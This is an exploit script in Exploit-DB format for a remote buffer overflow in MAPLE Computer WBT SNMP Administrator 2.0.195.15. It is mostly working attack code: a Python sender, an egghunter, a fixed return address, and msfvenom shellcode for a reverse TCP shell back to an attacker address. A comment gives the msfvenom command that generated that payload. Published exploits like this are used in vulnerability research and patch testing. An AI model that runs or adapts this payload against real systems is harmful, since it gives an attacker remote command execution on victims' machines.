# Exploit Title: MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter) # Author: sasaga92 # Discovery Date: 2019-07-18 # Vendor Homepage: www.computerlab.com # Software Link: https://www.computerlab.com/index.php/downloads/category/27-device-manager # Software Link: ftp://downloads.computerlab.com/software/SnmpSetup.195.15.EXE # Tested on OS: Windows XP SP2 x86 # CVE: N/A # [+] Credits: John Page (aka hyp3rlinx) #!/usr/bin/python import sys import socket import random import string import struct def pattern_create(_type,_length): _type = _type.split(" ") if _type[0] == "trash": return _type[1] * _length elif _type[0] == "random": return ''.join(random.choice(string.lowercase) for i in range(_length)) elif _type[0] == "pattern": _pattern = '' _parts = ['A', 'a', '0'] while len(_pattern) != _length: _pattern += _parts[len(_pattern) % 3] if len(_pattern) % 3 == 0: _parts[2] = chr(ord(_parts[2]) + 1) if _parts[2] > '9': _parts[2] = '0' _parts[1] = chr(ord(_parts[1]) + 1) if _parts[1] > 'z': _parts[1] = 'a' _parts[0] = chr(ord(_parts[0]) + 1) if _parts[0] > 'Z': _parts[0] = 'A' return _pattern else: return "Not Found" def pwned(_host, _port, _payload): print "[*] Conectandose a {0}:{1}...".format(_host, _port) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((_host, _port)) print "[*] Conectado, Enviando payload {0} bytes...".format(len(_payload)) _payload = "{0}\r\n\r\n".format(_payload) s.send(_payload) _data = s.recv(1024) s.shutdown s.close print 'Recibido:', repr(_data) print "[+] Payload de {0} bytes Enviado, Satisfactoriamente su payload ejecutado.".format(len(_payload)) def main(): _host = "192.168.0.12" _port = 987 _offset_eip = 642200 _padding = 642144 _eip = "\xc3\x78\xd7\x5a" #call ebx 0x5AD778C3 _tag = "w00tw00t" #msfvenom -p windows/shell/reverse_tcp LHOST=192.168.0.11 LPORT=443 -e x86/alpha_mixed -f c _shellcode = ("\x89\xe6\xda\xd8\xd9\x76\xf4\x5d\x55\x59\x49\x49\x49\x49\x49" "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32" "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" "\x39\x6c\x39\x78\x6c\x42\x53\x30\x73\x30\x35\x50\x35\x30\x4d" "\x59\x78\x65\x30\x31\x4b\x70\x51\x74\x6e\x6b\x36\x30\x54\x70" "\x4e\x6b\x33\x62\x74\x4c\x4e\x6b\x30\x52\x52\x34\x4c\x4b\x44" "\x32\x45\x78\x46\x6f\x6c\x77\x33\x7a\x31\x36\x64\x71\x6b\x4f" "\x6e\x4c\x65\x6c\x30\x61\x73\x4c\x74\x42\x46\x4c\x67\x50\x59" "\x51\x68\x4f\x36\x6d\x76\x61\x7a\x67\x59\x72\x4c\x32\x51\x42" "\x32\x77\x4e\x6b\x33\x62\x36\x70\x6e\x6b\x52\x6a\x47\x4c\x4e" "\x6b\x42\x6c\x76\x71\x61\x68\x5a\x43\x52\x68\x33\x31\x58\x51" "\x63\x61\x6c\x4b\x52\x79\x45\x70\x57\x71\x79\x43\x4c\x4b\x53" "\x79\x62\x38\x4b\x53\x44\x7a\x37\x39\x4c\x4b\x66\x54\x4c\x4b" "\x47\x71\x38\x56\x76\x51\x49\x6f\x6e\x4c\x7a\x61\x78\x4f\x34" "\x4d\x76\x61\x5a\x67\x56\x58\x79\x70\x33\x45\x49\x66\x66\x63" "\x51\x6d\x69\x68\x65\x6b\x73\x4d\x66\x44\x64\x35\x5a\x44\x50" "\x58\x4e\x6b\x30\x58\x37\x54\x47\x71\x59\x43\x63\x56\x6e\x6b" "\x44\x4c\x50\x4b\x4c\x4b\x46\x38\x75\x4c\x43\x31\x69\x43\x4e" "\x6b\x44\x44\x6c\x4b\x45\x51\x38\x50\x4d\x59\x57\x34\x36\x44" "\x51\x34\x51\x4b\x53\x6b\x33\x51\x71\x49\x53\x6a\x76\x31\x6b" "\x4f\x69\x70\x61\x4f\x63\x6f\x53\x6a\x6e\x6b\x62\x32\x58\x6b" "\x6e\x6d\x61\x4d\x75\x38\x55\x63\x37\x42\x53\x30\x77\x70\x52" "\x48\x54\x37\x74\x33\x57\x42\x71\x4f\x32\x74\x50\x68\x62\x6c" "\x51\x67\x36\x46\x56\x67\x6e\x69\x59\x78\x6b\x4f\x4e\x30\x6e" "\x58\x4e\x70\x73\x31\x55\x50\x53\x30\x56\x49\x48\x44\x53\x64" "\x66\x30\x45\x38\x76\x49\x6f\x70\x32\x4b\x33\x30\x79\x6f\x4e" "\x35\x43\x5a\x57\x7a\x31\x78\x6b\x70\x4f\x58\x75\x50\x76\x6b" "\x33\x58\x75\x52\x65\x50\x43\x31\x6d\x6b\x6c\x49\x48\x66\x72" "\x70\x76\x30\x76\x30\x66\x30\x43\x70\x46\x30\x61\x50\x72\x70" "\x32\x48\x6b\x5a\x56\x6f\x69\x4f\x4b\x50\x69\x6f\x48\x55\x7a" "\x37\x43\x5a\x56\x70\x31\x46\x36\x37\x43\x58\x6e\x79\x6e\x45" "\x42\x54\x51\x71\x4b\x4f\x39\x45\x4e\x65\x4b\x70\x43\x44\x46" "\x6a\x39\x6f\x70\x4e\x45\x58\x50\x75\x38\x6c\x49\x78\x33\x57" "\x35\x50\x35\x50\x73\x30\x32\x4a\x45\x50\x71\x7a\x64\x44\x31" "\x46\x50\x57\x42\x48\x64\x42\x78\x59\x4a\x68\x73\x6f\x49\x6f" "\x49\x45\x4d\x53\x48\x78\x73\x30\x71\x6e\x77\x46\x6e\x6b\x75" "\x66\x73\x5a\x57\x30\x73\x58\x67\x70\x34\x50\x47\x70\x47\x70" "\x46\x36\x70\x6a\x37\x70\x50\x68\x51\x48\x69\x34\x76\x33\x78" "\x65\x39\x6f\x79\x45\x5a\x33\x76\x33\x51\x7a\x55\x50\x66\x36" "\x71\x43\x52\x77\x31\x78\x56\x62\x78\x59\x6f\x38\x53\x6f\x49" "\x6f\x79\x45\x4e\x63\x58\x78\x45\x50\x71\x6d\x64\x68\x70\x58" "\x61\x78\x33\x30\x51\x50\x43\x30\x47\x70\x53\x5a\x53\x30\x70" "\x50\x51\x78\x64\x4b\x36\x4f\x44\x4f\x50\x30\x69\x6f\x58\x55" "\x31\x47\x31\x78\x54\x35\x52\x4e\x62\x6d\x35\x31\x49\x6f\x7a" "\x75\x31\x4e\x51\x4e\x4b\x4f\x64\x4c\x46\x44\x76\x6f\x6e\x65" "\x54\x30\x59\x6f\x79\x6f\x4b\x4f\x6b\x59\x4f\x6b\x69\x6f\x79" "\x6f\x39\x6f\x37\x71\x48\x43\x51\x39\x4f\x36\x74\x35\x6f\x31" "\x58\x43\x4f\x4b\x78\x70\x58\x35\x6e\x42\x43\x66\x70\x6a\x37" "\x70\x73\x63\x69\x6f\x59\x45\x41\x41") _egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7") _inject = pattern_create("trash A", _padding-len(_tag)-len(_shellcode)) _inject += _tag _inject += _shellcode _inject += _egghunter _inject += pattern_create("trash B", _offset_eip-len(_inject)) _inject += _eip print(_inject) pwned(_host,_port,_inject) if __name__ == "__main__": main()